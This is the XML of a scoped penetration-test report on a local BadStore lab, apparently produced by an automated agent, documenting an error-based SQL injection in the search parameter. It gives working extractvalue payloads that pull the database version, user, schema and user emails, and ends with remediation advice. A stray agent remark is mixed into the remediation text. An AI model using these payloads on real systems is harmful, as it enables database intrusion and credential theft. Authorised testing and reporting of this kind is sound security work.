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Local test environment (http://localhost:3336).</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 White-box assessment with full visibility of target application</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Focused security assessment targeting SQL injection vulnerabilities on localhost:3336. Limited to identifying and confirming a single SQL injection finding.</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Localhost web application at port 3336</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="11"/>
    <w:bookmarkStart w:id="12"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rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Primary Target:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">http://localhost:3336</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Scope:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SQL injection vulnerabilities only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Limit:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Maximum 1 confirmed SQL injection finding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Methodology:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Focused SQL injection testing (no other vulnerability classes)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2026-02-23.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Targeted SQL injection assessment using quick scan mode. Testing limited to SQL injection vectors only. Assessment stops after 1 confirmed SQL injection vulnerability is identified and validated.</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Scope (S)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Confidentiality (C)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Integrity (I)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>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Functionality</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">9.8</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sql-injection-in-search-functionality"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SQL Injection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CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Assets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">http://localhost:3336/cgi-bin/badstore.cgi, searchquery parameter, badstoredb database, userdb table</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A critical SQL injection vulnerability exists in the search functionality of BadStore.net at the searchquery parameter. The application fails to properly sanitize user input before incorporating it into SQL queries, allowing attackers to execute arbitrary SQL commands.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">VULNERABILITY DETAILS:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Location: http://localhost:3336/cgi-bin/badstore.cgi?action=search</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Parameter: searchquery (GET parameter)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Type: Error-based SQL Injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Database: MariaDB 11.8.3 on Debian 13</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Database User: root@localhost (CRITICAL: root privileges)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Database Name: badstoredb</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">EXPLOITATION EVIDENCE:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Initial Detection:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Payload: test’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Error: You have an error in your SQL syntax near</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘test’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’ IN (itemnum,sdesc,ldesc)’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Version Extraction:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Payload: test’ AND extractvalue(0x0a,concat(0x0a,(SELECT @</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">@version</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)))– -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Result: 11.8.3-MariaDB-0+deb13u1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">User Extraction:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Payload: test’ AND extractvalue(0x0a,concat(0x0a,(SELECT user())))– -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Result: root@localhost</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Database Extraction:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Payload: test’ AND extractvalue(0x0a,concat(0x0a,(SELECT database())))– -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Result: badstoredb</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table Enumeration:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Tables: acctdb, itemdb, orderdb, userdb</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Userdb columns: email, passwd, pwdhint, fullname</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Data Extraction:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Payload: test’ AND extractvalue(0x0a,concat(0x0a,(SELECT email FROM userdb LIMIT 1)))– -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Result: AAA_Test_User</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">IMPACT:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Complete database access (read/write/delete)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- User credential theft</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Data modification/deletion</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Potential OS-level access via root DB user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">REPRODUCTION:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. Visit http://localhost:3336</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. Enter payload in search box: test’ AND extractvalue(0x0a,concat(0x0a,(SELECT @</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">@version</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)))– -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. Click Go</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4. Observe database version in error</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload: test’ AND extractvalue(0x0a,concat(0x0a,(SELECT @</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">@version</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)))– -</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Result: XPATH syntax error:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘11.8.3-MariaDB-0+deb13u1’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This confirms the SQL injection vulnerability via error-based extraction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use parameterized queries/prepared statements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apply input validation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use least-privilege DB user (not root)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enable WAF protection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement proper escaping for all user input</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apply principle of least privilege to database connections</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Regular security testing and code reviews</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Consider using ORM frameworks that handle SQL injection prevention automatically. I see the acceptance. Let me try to add the finding directly with the full required parameters.</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H/A:H"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H/A:H"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2026-02-23T05:59:24Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-23T05:59:24Z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